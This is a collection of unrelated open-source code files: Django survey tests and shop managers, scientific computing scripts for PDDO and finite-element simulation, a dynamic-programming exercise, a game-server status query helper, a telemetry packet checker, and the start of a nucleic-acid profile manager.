wait(func, *args, retires=10, exceptions=[AssertionError, NoSuchElementException], **kwargs):\n for i in range(retires):\n try:\n return func(*args, **kwargs)\n except Exception as e:\n print('retry', i)\n if type(e) not in exceptions:\n raise e\n\n if i == retires-1:\n raise e\n\n sleep(0.5 + i*.2)\n\ndef wait_until_document_ready(browser):\n WebDriverWait(browser, 20) \\\n .until(lambda d: d.execute_script('return document.readyState == \"complete\"'))\n \n\n\nclass FunctionalTestCase(StaticLiveServerTestCase):\n def setUp(self):\n self.browser = webdriver.Chrome()\n super().setUp()\n\n def tearDown(self):\n self.browser.quit()\n super().tearDown()\n \nclass SurveysFunctionalTest(FunctionalTestCase):\n ''''Collections of all functional tests'''\n def setUp(self):\n self.surveys = factory.create_surveys()\n super().setUp()\n\n def test_can_see_list_of_surveys(self):\n '''Test page lists surveys in database'''\n self.browser.get(self.live_server_url)\n title_elements = wait(self.browser.find_elements_by_css_selector, '.surveys .card-title')\n summary_elements = self.browser.find_elements_by_css_selector('.surveys .card-text')\n\n self.assertEqual([survey.title.lower() for survey in self.surveys],\n [elem.text.lower() for elem in title_elements])\n self.assertEqual([survey.summary.lower() for survey in self.surveys],\n [elem.text.lower() for elem in summary_elements])\n\n def test_survey_response_count_in_list_item(self):\n '''test list item shows response of a survey'''\n factory.add_responses_to_surveys(self.surveys)\n counts = [SurveyResponse.objects.exclude(completed_date=None).filter(survey=survey).count() for survey in self.surveys]\n self.browser.get(self.live_server_url)\n resp_count_elements = wait(self.browser.find_elements_by_css_selector, '.surveys .resp_count')\n self.assertEqual([elem.text for elem in resp_count_elements], list(map(str, counts)))\n\n\n\n def test_clicking_list_items_takes_to_survey_page(self):\n '''Test clicking on survey items takes to survey page'''\n self.browser.get(self.live_server_url)\n self.browser.find_element_by_id(f'survey_{self.surveys[0].pk}').click()\n self.assertEqual(urlparse(self.browser.current_url).path,\n reverse(\"survey:detail\", args=[self.surveys[0].pk]))\n\n\nclass SurveyFunctionalTest(FunctionalTestCase):\n '''Functional tests for survey detail view'''\n\n def setUp(self):\n self.survey = factory.create_surveys()[0]\n super().setUp()\n\n def test_view_shows_correct_survey(self):\n '''Test detail view showing correct survey'''\n self.browser.get(self.live_server_url+self.survey.get_absolute_url())\n survey_title = self.browser.find_element_by_id('survey-title').text\n self.assertEqual(survey_title.lower(), self.survey.title.lower())\n\n survey_summary = self.browser.find_element_by_id('survey-summary').text\n self.assertEqual(survey_summary, self.survey.summary)\n\n def test_can_go_to_takesurvey_page(self):\n '''Test can go to takesurvey page of by clicking button'''\n survey_with_question = factory.create_survey_with_questions()\n self.browser.get(self.live_server_url+survey_with_question.get_absolute_url())\n self.browser.find_element_by_id('btn_takesurvey').click()\n\n expected_url = reverse('survey:take_survey', args=[survey_with_question.pk, 1])\n self.assertEqual(urlparse(self.browser.current_url).path, expected_url)\n\n def test_take_survey_button_disabled_when_no_questions(self):\n '''Test Take Survey buttion is disabled if survey don't have questions'''\n self.browser.get(self.live_server_url+self.survey.get_absolute_url())\n \n # raises error if button is not disabled\n btn = self.browser.find_element_by_css_selector('#btn_takesurvey.disabled')\n with self.assertRaises(ElementClickInterceptedException):\n btn.click()\n\nclass TakeSurveyFunctionalTest(FunctionalTestCase):\n '''Test case for TakeSurvey view'''\n\n def setUp(self):\n self.survey = factory.create_survey_with_questions()\n super().setUp()\n\n def test_invoking_url_shows_ui_of_1st_question(self):\n '''Test hitting url of TakeSurvey page will show 1st question of specified survey'''\n url = reverse('survey:take_survey', args=[self.survey.pk, 1])\n self.browser.get(self.live_server_url+url)\n\n self.assertEqual(self.browser.find_element_by_id('survey-title').text.lower(),\n self.survey.title.lower())\n\n self.assertEqual(self.browser.find_element_by_id('question-title').text.lower(),\n self.survey.questions.first().question.lower())\n\n def load_question_at(self, index):\n url = reverse('survey:take_survey', args=[self.survey.pk, index])\n self.browser.get(self.live_server_url+url)\n btn_next = self.browser.find_element_by_id('btn-next')\n btn_previous = self.browser.find_element_by_id('btn-previous')\n return btn_next, btn_previous\n\n def test_previous_button_disabled_for_1st_question(self):\n # for 1st question\n _, btn_previous = self.load_question_at(1)\n with self.assertRaises(ElementClickInterceptedException):\n btn_previous.click()\n\n def test_previous_button_works(self):\n btn_next, btn_previous = self.load_question_at(2)\n btn_next.click()\n \n btn_previous = wait(self.browser.find_element_by_id, 'btn-previous')\n sleep(1)\n btn_previous.click()\n expected_url = reverse('survey:take_survey', args=[self.survey.pk, 2])\n sleep(3)\n self.assertEqual(urlparse(self.browser.current_url).path, expected_url)\n\n \n def test_next_button_works(self):\n # for 1st question\n btn_next, _ = self.load_question_at(1)\n btn_next.click()\n expected_url = reverse('survey:take_survey', args=[self.survey.pk, 2])\n self.assertEqual(urlparse(self.browser.current_url).path, expected_url)\n\n # for questions betweeen 1st and last\n btn_next, _ = self.load_question_at(2)\n btn_next.click()\n expected_url = reverse('survey:take_survey', args=[self.survey.pk, 3])\n self.assertEqual(urlparse(self.browser.current_url).path, expected_url)\n\n # for last question\n last_index = self.survey.questions.count()\n btn_next, _ = self.load_question_at(last_index)\n\n expected_url = reverse('survey:finish_survey', args=[self.survey.pk])\n next_url = urlparse(btn_next.get_attribute('href')).path\n btn_next.click()\n self.assertEqual(next_url, expected_url)\n\n\n def test_survey_response_id_cookie_set(self):\n url = reverse('survey:take_survey', args=[self.survey.pk, 1])\n self.browser.get(self.live_server_url+url)\n value = self.browser.get_cookie(f'survey_response_id_{self.survey.pk}')['value']\n self.assertTrue(value.isnumeric())\n\n\n\nclass QuestionTypeTestCase(FunctionalTestCase):\n question_type = None\n def setUp(self):\n self.survey = factory.create_survey_with_questions()\n self.question, index = factory.get_question_and_index_of_type(self.survey, self.question_type.name)\n self.url = reverse('survey:take_survey', args=[self.survey.pk, index])\n super().setUp()\n\n\nclass TestDescQuestionType(QuestionTypeTestCase):\n '''Test case for Text question type'''\n question_type = QuestionTypes.DESC\n def test_ui_for_description_type_question(self):\n self.browser.get(self.live_server_url+self.url)\n self.assertEqual(self.browser.find_element_by_id('description').text, self.question.description)\n\nclass TestTextQuestionType(QuestionTypeTestCase):\n '''Test case for Text question type'''\n question_type = QuestionTypes.TEXT\n def test_ui_of_text_question_type(self):\n '''Test ui components of text question type'''\n self.browser.get(self.live_server_url + self.url)\n self.browser.find_element_by_css_selector('input#id_response')\n\n form = self.browser.find_element_by_id('question_form')\n self.assertEqual(urlparse(form.get_attribute('action')).path, self.url)\n self.assertEqual(form.get_attribute('method'), 'post')\n\n def test_question_form_is_loaded_with_existing_answer(self):\n '''Test question form pre-loads'''\n self.browser.get(self.live_server_url + self.url)\n inp = self.browser.find_element_by_css_selector(\"input#id_response\")\n inp.send_keys(\"This is my answer\")\n\n self.browser.find_element_by_id('btn-next').click()\n\n wait_until_document_ready(self.browser)\n btn_previous = self.browser.find_element_by_id('btn-previous')\n btn_previous.click()\n wait_until_document_ready(self.browser)\n inp = self.browser.find_element_by_css_selector(\"input#id_response\")\n self.assertEqual(inp.get_attribute('value'), \"This is my answer\")\n\n \n\n\nclass TestFinishSurveyView(FunctionalTestCase):\n '''Functional test for FinishSurvey view'''\n\n def setUp(self):\n super().setUp()\n self.survey, self.survey_response = factory.create_survey_with_text_question_and_answer()\n self.cookie_key = f'survey_response_id_{self.survey.pk}'\n self.browser.get(self.live_server_url)\n self.browser.add_cookie({'name': self.cookie_key, 'value': str(self.survey_response.pk)})\n url = reverse('survey:finish_survey', args=[self.survey.pk])\n self.browser.get(self.live_server_url+url)\n\n def test_review_button_works(self):\n '''Test review button starts the survey again for review'''\n \n self.browser.find_element_by_id(\"btn-review\").click()\n\n self.assertEqual(urlparse(self.browser.current_url).path,\n reverse('survey:take_survey', args=[self.survey.pk, 1]))\n \n\n def test_complete_button_marks_survey_response_complete(self):\n '''Test pressing Finish button updates survey_response's complted_date'''\n \n btn_finish = self.browser.find_element_by_id(\"btn-finish\")\n\n with self.assertRaises(NoSuchElementException):\n self.browser.find_element_by_css_selector('div#done')\n\n btn_finish.click()\n wait(self.assertEqual, urlparse(self.browser.current_url).path, reverse('survey:thank_you'))\n\n self.assertEqual(urlparse(self.browser.current_url).path, reverse('survey:thank_you'))\n","repo_name":"devbkhadka/survey_app","sub_path":"survey_app_repo/survey/tests/test_functional.py","file_name":"test_functional.py","file_ext":"py","file_size_in_byte":11478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14582786784","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\nfrom django.db.models import F\nfrom rest_framework.response import Response\nimport shop.models as my_models\nfrom shop.models import *\nfrom user.models import *\n\n\nclass CategoryQuerySet(models.QuerySet):\n def get_super_category(self, name):\n super_category = None\n try:\n super_category = self.get(name=name)\n except Category.DoesNotExist:\n print('crawler is buggy!')\n\n return super_category\n\n def create_category(self, name, super_category=None):\n return self.create(name=name, super_category=super_category)\n\n def make_or_get(self, category_name):\n return self.get_or_create(name=category_name)\n\n\nclass CategoryManager(models.Manager):\n\n def get_queryset(self):\n return CategoryQuerySet(self.model, using=self._db)\n\n def create_for_crawler(self, data):\n super_category_name = data['super_category']\n category_name = data['name']\n if super_category_name is not None:\n super_category = self.get_queryset().get_super_category(super_category_name)\n return self.get_queryset().create_category(category_name, super_category)\n return self.get_queryset().create_category(category_name)\n\n def process_category(self, data):\n self.create_for_crawler(data)\n\n def make_or_get(self, category_name):\n return self.get_queryset().make_or_get(category_name)\n\n\nclass ProductQuerySet(models.QuerySet):\n def create_product(self, product):\n return self.create(id=product['id'], title=product['title'], brand=product['brand'], category=product['category'])\n\n\nclass ProductManager(models.Manager):\n def get_queryset(self):\n return ProductQuerySet(self.model, using=self._db)\n\n def process_product(self, data):\n self.create_product(data)\n\n def create_product(self, data):\n return self.get_queryset().create_product(data)\n\n\nclass VendorProductQuerySet(models.QuerySet):\n pass\n\n\nclass VendorProductManager(models.Manager):\n def get_queryset(self):\n return VendorProductQuerySet(self.model, using=self._db)\n\n def get_vendor_products_by_view(self, username):\n return self.get_queryset().order_by('-number_of_views'\n ).values('product__id',\n 'base_price', 'price', 'discount_percent',\n 'discount_price_difference', 'number_of_views', 'product__title',\n 'product__brand__name', 'product__category__name').filter(vendor__name=username)\n\n def get_vendor_products_with_detail(self):\n return self.get_queryset().values('product__id',\n 'base_price', 'price', 'discount_percent',\n 'discount_price_difference', 'number_of_views', 'product__title',\n 'product__brand__name', 'product__category__name')\n\n def increment_vendor_product_views(self, primary_key):\n vendor_product = self.get_queryset().filter(product_id=primary_key)\n vendor_product.update(number_of_views=F('number_of_views') + 1)\n # try:\n # my_object = self.get_queryset().get(product_id=primary_key)\n # my_object.number_of_views = my_object.number_of_views + 1\n # my_object.save()\n # except my_models.VendorProduct.DoesNotExist:\n # print(\"user is not a vendor!\")\n\n\nclass CrawlerProductProcessor(models.Manager):\n\n @classmethod\n def process(cls, data):\n category = cls.create_or_get_category(data['category_name'])\n brand = cls.create_or_get_brand(data['brand'], category)\n product_info = {\n 'id': data['id'],\n 'title': data['name'],\n 'brand': brand,\n 'category': category,\n }\n product = cls.create_or_get_product(product_info)\n vendor = cls.create_or_get_vendor(data['vendor'])\n cls.create_or_get_vendor_product(product, vendor, data)\n\n @classmethod\n def create_or_get_brand(cls, brand_name, brand_category):\n brand = None\n try:\n brand, created = my_models.Brand.objects.get_or_create(name=brand_name, defaults={'category': brand_category})\n except my_models.Brand.DoesNotExist:\n print(\"created brand!\")\n return brand\n\n @staticmethod\n def create_or_get_category(category_name):\n category, created = my_models.Category.objects.make_or_get(category_name=category_name)\n return category\n\n @classmethod\n def create_or_get_vendor(cls, name):\n vendor, created = my_models.Vendor.objects.get_or_create(name=name)\n cls.map_vendor_to_existing_user(vendor)\n return vendor\n\n @staticmethod\n def create_or_get_vendor_product(product, vendor, other_info):\n default = {\n 'base_price': other_info['base_price'],\n 'price': other_info['price'],\n 'id': other_info['id'],\n }\n my_models.VendorProduct.objects.get_or_create(product=product, vendor=vendor, defaults=default)\n\n @staticmethod\n def create_or_get_product(data):\n product = None\n try:\n default = {\n 'category': data['category'],\n 'brand': data['brand'],\n 'id': data['id'],\n }\n product, created = my_models.Product.objects.get_or_create(id=data['id'], title=data['title'], defaults=default)\n except my_models.Product.DoesNotExist:\n print('product created!')\n return product\n\n @classmethod\n def map_vendor_to_existing_user(cls, vendor):\n users = User.objects.filter(username=vendor.name)\n if users.count() == 1:\n vendor.user = users[0]\n vendor.save()\n","repo_name":"Mhb-Stud/product_data_api_bayati","sub_path":"shop/managers.py","file_name":"managers.py","file_ext":"py","file_size_in_byte":5948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70387119787","text":"#! /usr/bin/env python\nimport numpy as np\nimport pandas as pd\nfrom math import log, exp\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\n\nif __name__ == '__main__':\n data = pd.read_csv(\"laurent_coeffs_2_511.csv\", sep=',\\s+')\n odd_numerators = data['numerator'][1::2]\n even_numerators = data['numerator'][::2]\n \n model = LinearRegression()\n\n start_idx = 120\n\n x = np.reshape(odd_numerators.index[start_idx:], (-1,1))\n y = [[log(abs(int(a)))] for a in odd_numerators.values[start_idx:]]\n model.fit(x,y)\n\n score = model.score(x,y)\n\n slope = model.coef_[0][0]\n intercept = model.intercept_[0]\n\n print(\"Slope: {}\\nIntercept: {}\".format(slope, intercept))\n print(f\"Exp growth rate: {exp(slope)}\")\n\n\n # plt.loglog(even_numerators)\n # plt.show()\n","repo_name":"DannyStoll1/polymath-fractal-geometry","sub_path":"codes/coeffs_log_log_plot.py","file_name":"coeffs_log_log_plot.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"21244493704","text":"\n\n\"\"\"\nInput: {4,2,3,6,10,1,12}\nOutput: 5\nExplanation: The LBS is {2,3,6,10,1}.\n\nlength of Longest Increasing Subseq\nmax_len =\n{4,2,3,6,10,1,12}\n\"\"\"\n\n\"\"\"\n{11,2,1,0,12}\n{11,2,13, 1,0,11,-1,12}\n{11,2,13}\nmax_len = 1\nprev = 11\ncur = 2\n\n{\n 11: 0,\n 2: 1,\n}\n[\n [],\n [],\n]\n--\n{11,2,13, 1,0,11,-1,12}\n 11\n subset = []\n--\ni = 1\nel = 2\nsubset = [11]\n--\ni = 2\nel = 13\nsubset = [11, 13]\n\ndef longstIncSubsequence(nums):\n max_len = 0\n def backtrack(i, nums, subset):\n if i == len(nums):\n return len(subset)\n\n if not subset or nums[i] > subset[-1]:\n subset.append(nums[i])\n dp[cur + 1][] = dp[cur][]\n\n return backtrack(i + 1, nums, subset)\n for i in range(len(nums)):\n max_len = max(backtrack(i, nums, []), max_len)\n return max_len\n\"\"\"\n\ndef longest_increasing_subsequence(nums):\n dp = [[0]*len(nums) for _ in range(0,len(nums)+1)]\n def helper(nums,pre,cur,dp):\n if cur >= len(nums) or pre >= len(nums):\n return 0\n\n if dp[cur][pre + 1]:\n return dp[cur][pre + 1]\n res1 = 0\n if pre == -1 or nums[pre] < nums[cur]:\n res1 = 1 + helper(nums, cur, cur + 1, dp)\n res2 = helper(nums, pre, cur + 1, dp)\n\n current_longest_sub = max(res1, res2)\n dp[cur][pre + 1] = current_longest_sub\n return current_longest_sub\n return helper(nums, -1, 0, dp)\n\n\n\n\"\"\"\n public int findLISLength(int[] nums) {\n int[] dp = new int[nums.length];\n dp[0] = 1;\n\n int maxLength = 1;\n for (int i=1; i nums[j] && dp[i] <= dp[j] ) {\n dp[i] = dp[j]+1;\n maxLength = Math.max(maxLength, dp[i]);\n }\n }\n return maxLength;\n }\n public int findLCSLength(String s1, String s2) {\n Integer[][] dp = new Integer[s1.length()][s2.length()];\n return findLCSLengthRecursive(dp, s1, s2, 0, 0);\n }\n\n private int findLCSLengthRecursive(Integer[][] dp, String s1, String s2, int i1, int i2) {\n if (i1 == s1.length() || i2 == s2.length())\n return 0;\n\n if (dp[i1][i2] == null) {\n if (s1.charAt(i1) == s2.charAt(i2))\n dp[i1][i2] = 1 + findLCSLengthRecursive(dp, s1, s2, i1 + 1, i2 + 1);\n else {\n int c1 = findLCSLengthRecursive(dp, s1, s2, i1, i2 + 1);\n int c2 = findLCSLengthRecursive(dp, s1, s2, i1 + 1, i2);\n dp[i1][i2] = Math.max(c1, c2);\n }\n }\n\n return dp[i1][i2];\n }\n\"\"\"\n","repo_name":"aarboleda1/Elements-Of-Programming-Interviews","sub_path":"mock_interviews/longest_increasing_subsequence.py","file_name":"longest_increasing_subsequence.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"12555177698","text":"import numpy as np\nfrom scipy import spatial\nfrom scipy.sparse import csr_matrix\nfrom PDDO_Utilities import *\n\nfrom itertools import compress\n\n\nclass DM2D:\n def __init__(self, numtime, delta, dx, dt, varname):\n self.numtime = numtime\n self.delta = delta\n self.dx = dx\n self.dt = dt\n self.varname = varname\n self.velocity = []\n self.u_coords = []\n self.u_vals = []\n self.fams = []\n self.samp_ids = []\n self.u_samp = []\n self.fam_exst = False\n\n def check_fam_build(self):\n # Just checks if the families are constructed\n print(self.fam_exst)\n\n\n def split_fam_gen(self, d_coords, d_vals, init_lev_sets):\n \"\"\"\n Generates family member indices for given timeseries\n coordinates for the 2D region separated by the moving\n boundary\n \"\"\"\n self.fam_exst = True\n bool_reg = (init_lev_sets < 0)\n self.u_coords = list(compress(d_coords, bool_reg))\n tree_u = spatial.KDTree(self.u_coords)\n for k in self.u_coords:\n fam_pts = tree_u.query_ball_point(\n k, self.delta * self.dx, return_sorted=True\n )\n self.fams.append(fam_pts)\n for i in range(self.numtime - 1):\n self.u_vals.append(list(compress(d_vals[i], bool_reg)))\n self.velocity.append(list(compress((d_vals[i + 1] - d_vals[i]) / self.dt, bool_reg)))\n\n\n def gendmat(self, order):\n \"\"\"\n Global derivative matrix calculation using PDDO.\n \"\"\"\n nonzcounter = 0\n lenxy = len(self.u_coords)\n totnz = sum([len(listElem) for listElem in self.fams])\n _, _, _, lens = PD2D.binomial_coeff(order + 1)\n dmats = []\n dmatscsr = []\n amat = np.zeros([lens, lens])\n for _ in range(lens):\n dmats.append(\n [\n np.zeros(totnz, dtype=np.int),\n np.zeros(totnz, dtype=np.int),\n np.zeros(totnz),\n ]\n )\n for i in range(lenxy):\n bmat = PD2D.gen_bmat(order)\n pts = self.fams[i]\n amat.fill(0.0)\n for k in pts:\n xi = self.u_coords[k] - self.u_coords[i]\n amat += PD2D.gen_amat(xi, self.delta * self.dx, order)\n amat *= self.dx * self.dx\n cfs = np.linalg.solve(amat, bmat)\n for k in pts:\n xi = self.u_coords[k] - self.u_coords[i]\n gfs = PD2D.inv_gfunc(xi, self.delta * self.dx, cfs, order)\n for derord in range(lens):\n dmats[derord][0][nonzcounter] = i\n dmats[derord][1][nonzcounter] = k\n dmats[derord][2][nonzcounter] = gfs[derord] * self.dx * self.dx\n nonzcounter += 1\n for i in range(lens):\n dmatscsr.append(\n csr_matrix(\n (dmats[i][2], (dmats[i][0], dmats[i][1])),\n shape=(lenxy, lenxy),\n )\n )\n return dmatscsr\n\n def gen_derlist(self, order):\n _, ord1, ord2, _ = PD2D.binomial_coeff(order + 1)\n ord1 = [ord * \"x\" for ord in ord1]\n ord2 = [ord * \"y\" for ord in ord2]\n der_list = [self.varname + \"_{\" + i + j + \"}\" for i, j in zip(ord1, ord2)]\n der_list[0] = self.varname\n u_ders = [[] for x in range((order + 1) * (order + 2) // 2)]\n return der_list, u_ders\n","repo_name":"alicanbekar/MB_PDDO-SINDy","sub_path":"Fisher_KPP_Domain.py","file_name":"Fisher_KPP_Domain.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"73930482346","text":"import socket\nimport urllib\nimport struct\n\ndef Topic(addr:str, port:int, querystr:str or dict):\n \"\"\"\n\tFetch- oh i mean topic\n `getserverdata.php` (see tg repo)\n\t\"\"\"\n print(\"INFO: FETCH REQ: \"+addr+\":\"+str(port))\n try:\n if querystr[0] != \"?\":\n querystr = \"?\"+querystr\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n query = b\"\\x00\\x83\" + struct.pack('>H', len(querystr) + 6) + b\"\\x00\\x00\\x00\\x00\\x00\" + querystr.encode() + b\"\\x00\"\n\n sock.connect((addr, port))\n sock.sendall(query)\n data = sock.recv(4096)\n parsed_data = urllib.parse.parse_qs(data[5:-1].decode())\n return {i:parsed_data[i][0] for i in parsed_data.keys()}\n except Exception as E:\n print(\"ERROR: fetch: \",E)\n return {}\n\ndef getSeconds(h:int=0,m:int=0,s:int=0):\n return (int(h) * 3600) + (int(m) * 60) + int(s)\n\ndef safeget(dct:dict, *keys):\n \"\"\"\n get keys without ``KeyError``\n \"\"\"\n for key in keys:\n try:\n dct = dct[key]\n except KeyError:\n return None\n return dct\n","repo_name":"LetterN/cat-cog","sub_path":"ss13/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4492440703","text":"from ibvpy.api import \\\n TStepper as TS, RTDofGraph, RTraceDomainListField, RTraceDomainListInteg, TLoop, \\\n TLine, BCDofGroup, IBVPSolve as IS, DOTSEval, BCSlice\n\nfrom ibvpy.mesh.fe_grid import FEGrid\nfrom numpy import column_stack\n\ndef simgrid( fets_eval, \n cube_size,\n shape,\n support_slices,\n support_dirs,\n loading_slice,\n load_dir = 0,\n load_max = 0.01,\n n_load_steps = 1,\n vars = [],\n ivars = [],\n var_type = 'u',\n ):\n '''Construct an idealization and run simulation with primary variable \n fixed on support slices and with unit load on loading slices applied in load dir.\n Return the solution vector and the fields specified in vars.\n '''\n # Discretization\n domain = FEGrid( coord_max = cube_size, \n shape = shape,\n fets_eval = fets_eval )\n\n u_max = load_max\n\n support_bcond = [ BCSlice( var = 'u', value = 0, \n dims = support_dir, \n slice = domain[support_slice] )\n for support_slice, support_dir in zip( support_slices, support_dirs ) ]\n load_bcond = [ BCSlice( var = var_type, value = u_max, \n dims = [load_dir], \n slice = domain[loading_slice] ) ]\n\n bcond = support_bcond + load_bcond \n\n loading_dofs = domain[loading_slice].dofs[:,:,load_dir].flatten()\n\n graphs = [ RTDofGraph( name = 'Force in one node / Displ.',\n var_y = 'F_int', idx_x = loading_dof,\n var_x = 'U_k' , idx_y = loading_dof )\n for loading_dof in loading_dofs ]\n\n rtrace_list = [ RTraceDomainListField( name = var ,\n var = var,\n warp = True, \n #position = 'int_pnts',\n record_on = 'update' )\n for var in vars\n ]\n irtrace_list = [ RTraceDomainListInteg( name = 'Integ(' + var + ')' ,\n var = var,\n record_on = 'update' )\n for var in ivars ]\n \n ts = TS(\n sdomain = domain,\n bcond_list = bcond,\n rtrace_list = graphs + rtrace_list + irtrace_list\n )\n\n load_step = 1. / float( n_load_steps )\n # Add the time-loop control\n tloop = TLoop( tstepper = ts, KMAX = 15, RESETMAX = 0, tolerance = 1e-5,\n tline = TLine( min = 0.0, step = load_step, max = 1.0 ))\n\n u = tloop.eval()\n \n fields = [ rtrace.subfields[0].field_arr for rtrace in rtrace_list ]\n integs = [ rtrace.integ_val for rtrace in irtrace_list ]\n for graph in graphs:\n graph.redraw()\n traces = [ graph.trace for graph in graphs ]\n xydata = ( traces[0].xdata, column_stack( [trace.ydata for trace in traces ] ) )\n\n return tloop, u, fields, integs, xydata\n\nif __name__ == '__main__':\n\n from ibvpy.mats.mats3D.mats3D_elastic.mats3D_elastic import MATS3DElastic\n from ibvpy.mats.mats2D.mats2D_elastic.mats2D_elastic import MATS2DElastic\n \n from ibvpy.fets.fets3D.fets3D8h import FETS3D8H\n from ibvpy.fets.fets2D5.fets2D58h import FETS2D58H\n\n fets_eval_3D = FETS3D8H(mats_eval = MATS3DElastic(E = 34000, nu = 0.25)) \n\n support_slices = [\n [ (0 ,slice(None),slice(None),0 ,slice(None),slice(None)), # yz plane 0\n (0 ,0 ,slice(None),0 ,0 ,slice(None)), # z-axis 1\n (0 ,0 , 0,0 ,0 ,0 ) # origin 2\n ],\n [ \n (0 ,0 ,0 ,0 ,0 ,0 ), # origin 0\n (slice(None),0 ,slice(None),slice(None),0 ,slice(None)), # xz plane 1\n (slice(None),0 ,0 ,slice(None),0 ,0 ), # y-axis 2\n ],\n [ \n (0 ,slice(None),0 ,0 ,slice(None),0 ), # x-axis 0\n (0 ,0 ,0 ,0 ,0 ,0 ), # origin 1\n (slice(None),slice(None),0 ,slice(None),slice(None),0 ), # xy plane 2\n ], \n ]\n support_dirs = [[0],[1],[2]]\n \n loading_slices = [ \n (-1 ,slice(None),slice(None),-1 ,slice(None),slice(None)), # loading in x dir\n (slice(None),-1 ,slice(None),slice(None),-1 ,slice(None)), # loading in y dir\n (slice(None),slice(None),-1 ,slice(None),slice(None),-1 ) # loading in z dir\n ]\n\n tl, u1, fields, integs, g = simgrid( fets_eval_3D, (3,3,3), (1,1,1), \n support_slices[0], support_dirs,\n loading_slices[0], 0, 0.01, 1, [] )\n \n tl, u2, fields, integs, g = simgrid( fets_eval_3D, (3,3,3), (1,1,1), \n support_slices[1], support_dirs,\n loading_slices[1], 1, 0.01, 1, ['u'] )\n \n print('u1')\n for idx, u in enumerate( u1 ):\n print('[', idx, ']', u)\n \n print('u2')\n for idx, u in enumerate( u2 ):\n print('[', idx, ']', u)\n \n \n ","repo_name":"simvisage/bmcs","sub_path":"ibvpy/utils/simgrid.py","file_name":"simgrid.py","file_ext":"py","file_size_in_byte":5488,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"20629543573","text":"#!/usr/bin/env python\n\nimport argparse\n\nimport emit.data_products as dp\n\nPRIMARY_HDR_LEN = 6\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"infile\")\nparser.add_argument(\"threshold\", type=int)\nargs = parser.parse_args()\n\nin_file = open(args.infile, \"rb\")\n\ncnt = 0\nskip = 4000\nwhile True:\n try:\n pkt = dp.CCSDSPacket(in_file)\n # pkt_size = PRIMARY_HDR_LEN + pkt.pkt_data_len + 1\n pkt_size = pkt.pkt_data_len\n if pkt_size < args.threshold:\n print(f\"Found small packet of size {pkt_size}\")\n cnt += 1\n if pkt.pkt_seq_cnt % skip == 0:\n print(f\"Packet {str(pkt.pkt_seq_cnt).zfill(5)} size: {pkt_size}\")\n except EOFError:\n break\n\nprint(f\"Count of packets less than {args.threshold} bytes: {cnt}\")\n","repo_name":"emit-sds/emit-sds-l0","sub_path":"util/packet_size_check.py","file_name":"packet_size_check.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33512028959","text":"import atexit\nimport logging\nimport os\n\nimport settings\nfrom runner.managers.manager import Manager\nfrom structures.profiles import NucleicAcidProfile\n\nlogger = logging.getLogger(__name__)\n\n\nclass NucleicAcidProfileManager(Manager):\n \"\"\"\n Manager for the program's current NucleicAcidProfile instance.\n\n Attributes:\n current: The current NucleicAcidProfile instance.\n runner: NATuG's program runner.\n profiles_filepath: The path to the directory where profiles are stored.\n restored_filepath: The path to the file where the restored state is stored.\n default_profile_name: The name of the default profile.\n\n Methods:\n load_profiles: Load the nucleic acid profiles from files.\n dump_profiles: Dump the nucleic acid profiles into files.\n restore: Load default NucleicAcidProfile\n \"\"\"\n\n profiles_filepath = f\"saves/nucleic_acid\"\n default_filepath = f\"saves/nucleic_acid/{settings.default_nucleic_acid_profile}.json\"\n\n def __init__(self, runner: object, current: object = None, profiles=None):\n super().__init__(runner, current)\n if profiles:\n self.profiles = profiles\n else:\n self.profiles = {}\n self.load_profiles()\n atexit.register(self.dump)\n\n def restore(self):\n \"\"\"Load the default nucleic acid profile as the current one.\"\"\"\n self.current = self.profiles[settings.default_nucleic_acid_profile]\n logger.debug(\n f\"Loaded current nucleic acid profile {settings.default_nucleic_acid_profile}\"\n )\n\n def load_profiles(self) -> None:\n \"\"\"\n Load saved profiles and restored state from files.\n\n Each profile is loaded from a separate file in the profiles directory. The\n names of the files are the names of the profiles where underscores are\n replaced with spaces (dumping is the reverse of this).\n\n No specific current profile is set because when the program loads an entire\n program state is reloaded which includes the current nucleic acid profile.\n \"\"\"\n profile_files = filter(\n lambda filename: filename.endswith(\".json\"),\n os.listdir(self.profiles_filepath),\n )\n\n # Load all profiles from individual files in the profiles directory\n for name in profile_files:\n # Load the profile from the file (we make sure to replace underscores\n # with spaces and \".json\" with \"\")\n self.profiles[\n name.replace(\"_\", \" \").replace(\".json\", \"\")\n ] = NucleicAcidProfile.from_file(f\"{self.profiles_filepath}/{name}\")\n logger.info(\n f'Loaded \"%s\" from \"%s\"', name, f\"{self.profiles_filepath}/{name}.json\"\n )\n\n # Log that profiles were loaded\n logger.debug(\"Loaded profiles. Profiles: %s\", self.profiles)\n\n def dump(self) -> None:\n \"\"\"\n Dump profiles and the current state to files.\n\n Each profile is dumped to a separate file in the profiles directory. The\n names of the files are the names of the profiles where spaces are replaced\n with underscores (loading is the reverse of this).\n \"\"\"\n # Dump all profiles into individual files\n for filename in os.listdir(self.profiles_filepath):\n filepath = f\"{self.profiles_filepath}/{filename}\"\n os.remove(filepath)\n logger.debug(f\"Deleted nucleic acid profile file \\\"%s\\\"\", filepath)\n for name, profile in self.profiles.items():\n name = name.replace(\" \", \"_\")\n profile.to_file(f\"{self.profiles_filepath}/{name}.json\")\n logger.info(\n f'Dumped \"%s\" into \"%s\"', name, f\"{self.profiles_filepath}/{name}.json\"\n 